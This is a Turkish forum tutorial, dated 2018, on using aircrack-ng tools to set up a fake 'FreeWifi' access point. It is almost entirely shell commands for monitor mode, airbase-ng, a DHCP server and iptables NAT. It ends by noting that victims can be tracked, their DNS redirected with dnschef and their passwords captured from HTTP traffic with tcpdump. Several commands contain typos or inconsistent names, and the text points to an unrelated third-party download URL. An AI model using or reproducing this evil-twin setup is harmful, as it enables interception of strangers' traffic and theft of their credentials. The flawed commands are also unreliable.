- 1 Ara 2018
- 880
- 48
Aircrack-ng Nedir?
Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;
"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.
Aircrack ile Sahte Kablosuz Ağ Oluşturma
Terminalimizi açıp ilk komudumuz ile başlayalım.
Kod:
ifconfig
WLAN14 Bizim ağ adaptörümüz demektir.
Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.
Kod:
airmon-ng start wlan14
Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,
mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,
Kod:
modprobe r8187se
Ardından mon1 arayüzümüzü test edelim,
Kod:
airodum-ng mon1
Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz
Kod:
apt-get install dhcp3-server
Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz
Ardından bu komudu yazalım
Kod:
tar -xvf isc-dhcp-server.tar.gz -C /test
.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.
Kod:
dpkg -i isc.dhcp.server.dep
Kod:
reboot
Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim
Kod:
nano /etc/dhcp3/dhcpd.conf
ve direkt bu kısmı copy-paste yapın.
ddns-update-style ad-hoc; //bu alanı daha sonradan servis çalışmassa hata verirse kaldıracağız.
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.
Kod:
airbase-ng -e FreeWifi -c 11 -v wlan1 &
at0 isimli bir sanal arabirimi indirelim,
Kod:
ifconfig at0 up
Kod:
ifconfig at0 10.0.0.254 netmask 255.255.255.0
route komutunu yazalım,
Kod:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
iptable ayarlarımızı yapalım,
Kod:
iptables --flush
Kod:
iptables --table nat --flush
Kod:
iptables --delete-chain
Kod:
iptables -P FORWARD ACCEPT
Kod:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
DHCP serverimizi başlatalım,
Kod:
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
geçiş yapacak IP'lerimizi yönlendirelim.
Kod:
echo "1" > /proc/sys/net/ipv4/ip_forward
Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.
Son düzenleme: